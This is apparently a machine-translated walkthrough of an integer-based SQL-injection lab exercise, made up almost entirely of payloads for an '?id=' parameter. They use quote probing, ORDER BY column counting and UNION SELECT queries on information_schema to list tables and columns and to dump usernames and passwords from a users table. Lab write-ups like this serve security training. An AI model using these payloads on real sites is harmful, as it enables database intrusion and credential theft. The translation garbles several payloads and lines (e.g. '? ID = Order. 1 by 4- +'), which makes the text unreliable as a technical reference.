The GET-2 Less - Error based - based Intiger
1. original page
2.?id=1
3.?id=1 '
' 'the LIMIT 0,1' -> '' the LIMIT 0,1 '->' the LIMIT 0 1 -> since we are input id = 1 'is input = 1' can be determined as input LIMIT 0,1
SQL:Select login_name,password from admin where id = input limit 0,1
4. query field
? ID = Order. 1 by 4- +
? = ID +. 1 Order by 3-
to find the largest number is not being given, the table can be determined field length is 3
5. Query echo point
? Id = 0 SELECT 1,2,3-Union +
6. The query the database version information
? Id = 0 SELECT Union. 1, Version (), 3- +
7. The query the database and user
? Id = 0 union select 1, database (), user () - +
that security database named
8. lookup table name
? Id = 0 union select 1, (select group_concat (table_name) from information_schema.tables where table_schema = 'security'), 3- +
get all the security of the database table names, we take users
9. query column names
? Id = 0 union select 1, (select group_concat (column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 3- +
to give all users table column names, take username , password
10. queries the user name and password
? Id = 0 union select 1, group_concat (username, 0x3a, password), 3 from users- +
Note: 0x3a ':' hex value of the character